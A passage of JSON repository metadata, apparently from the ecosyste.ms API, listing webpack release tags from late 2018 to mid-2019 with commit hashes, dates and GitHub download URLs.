b.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"